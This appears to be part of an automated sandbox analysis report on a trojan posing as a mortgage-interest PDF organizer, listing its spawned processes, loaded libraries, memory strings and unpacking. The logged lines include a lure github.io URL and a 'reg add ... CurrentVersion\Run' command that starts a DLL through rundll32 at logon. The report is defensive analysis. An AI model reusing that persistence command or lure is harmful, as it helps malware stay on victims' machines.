Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET MSIfile=?54,LastUpdated=?70,LastSentTime=?71 WHERE Name=?2 AND Version LIKE ?3 AND Architecture LIKE ?10;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Status='new' WHERE Status != 'deleted';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM Application WHERE AppIsCompletelyScanned='true';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Stale=?5,LastUpdated=?70,LastSentTime=?71,Status='modified' WHERE Status != 'deleted' AND LastSentTime != 0 AND AppId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT FileId FROM File WHERE Path=?1 AND Sha256 LIKE ?4;

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,2931579537296338705,3953823219278610053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://maveuve.github.io/frlpodf/marynewreleasefax.html"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe"
Source: unknown	Process created: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe"
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process created: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe"
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process created: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe"
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: unknown	Process created: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,2931579537296338705,3953823219278610053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process created: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe"	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f & exit	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process created: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe"	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f	Jump to behavior

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: k7rn7l32.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: ntd3ll.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: k7rn7l32.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: ntd3ll.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	Section loaded: oledlg.dll	Jump to behavior

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: SumatraPDF-no-MuPDF.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: SumatraPDF-1.5.3.0.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: E:\building\360project\360sd\branches\beta\Build\x86\WhiteCache.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.000000001013D000.00000002.00000001.01000000.00000005.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.000000001039B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\_AppDiscovery_AppDiscovery_1.3.0@2\dev\AppDiscovery_scanner\scanner\src\ADScan\Release\bin\ADScan\ADScan.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: libmupdf.pdb source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000000.2148958453.00000000006C9000.00000002.00000001.01000000.00000004.sdmp

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe

Unpacked PE file: 9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack

Source: build.exe.13.dr

Static PE information: real checksum: 0x2ef980 should be: 0x3ec133

Source: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe	File created: \my organizer 2023 mortgage interest paymentspdf.exe
